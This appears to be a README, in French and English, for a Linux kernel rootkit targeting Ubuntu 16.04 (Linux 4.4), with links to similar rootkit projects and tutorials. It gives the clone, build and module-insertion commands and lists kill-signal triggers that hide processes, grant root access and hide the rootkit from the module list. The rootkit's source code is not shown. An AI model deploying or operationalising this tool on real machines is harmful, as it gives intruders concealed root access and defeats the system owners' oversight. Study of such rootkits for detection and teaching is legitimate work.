
Un rootkit pour ubuntu-16.04.6 (Linux 4.4). Peut masquer un processus, donner un accès root et se masquer lui-même
This is a rootkit which was tested on ubuntu-16.04.6-desktop-amd64 (Linux 4.4), but it should be easy to port to different kernel versions.
Link to video --> https://drive.google.com/file/d/1yDktAg9vIPBH3OPEBYset9OdQb0LMevA/view?usp=sharing
Clonez le dépôt
git clone https://github.com/Asekon/RootKit
Entrez dans le dossier
cd RootKit
Compilez
sudo make
Insérez le module dans le noyau en tant que root
sudo insmod RootKit.ko
(Dé)masquer un processus (exemple : PID 500)
kill -0 500
Obtenir un accès root (vous pouvez insérer n'importe quel PID, il ne doit pas être 0)
kill -1 0
(Dé)masquer le rootkit (vous pouvez insérer n'importe quel PID, il ne doit pas être 0)
kill -2 0
Retirez le module du noyau en tant que root (assurez-vous d'abord qu'il est visible dans la liste des modules)
sudo rmmod RootKit
https://en.wikipedia.org/wiki/Rootkit
http://dandylife.net/blog/archives/304
https://github.com/nurupo/rootkit
https://github.com/f0rb1dd3n/Reptile
https://github.com/m0nad/Diamorphine
http://derekmolloy.ie/writing-a-linux-kernel-module-part-1-introduction/
http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html
https://yassine.tioual.com/index.php/2017/01/10/hiding-processes-for-fun-and-profit/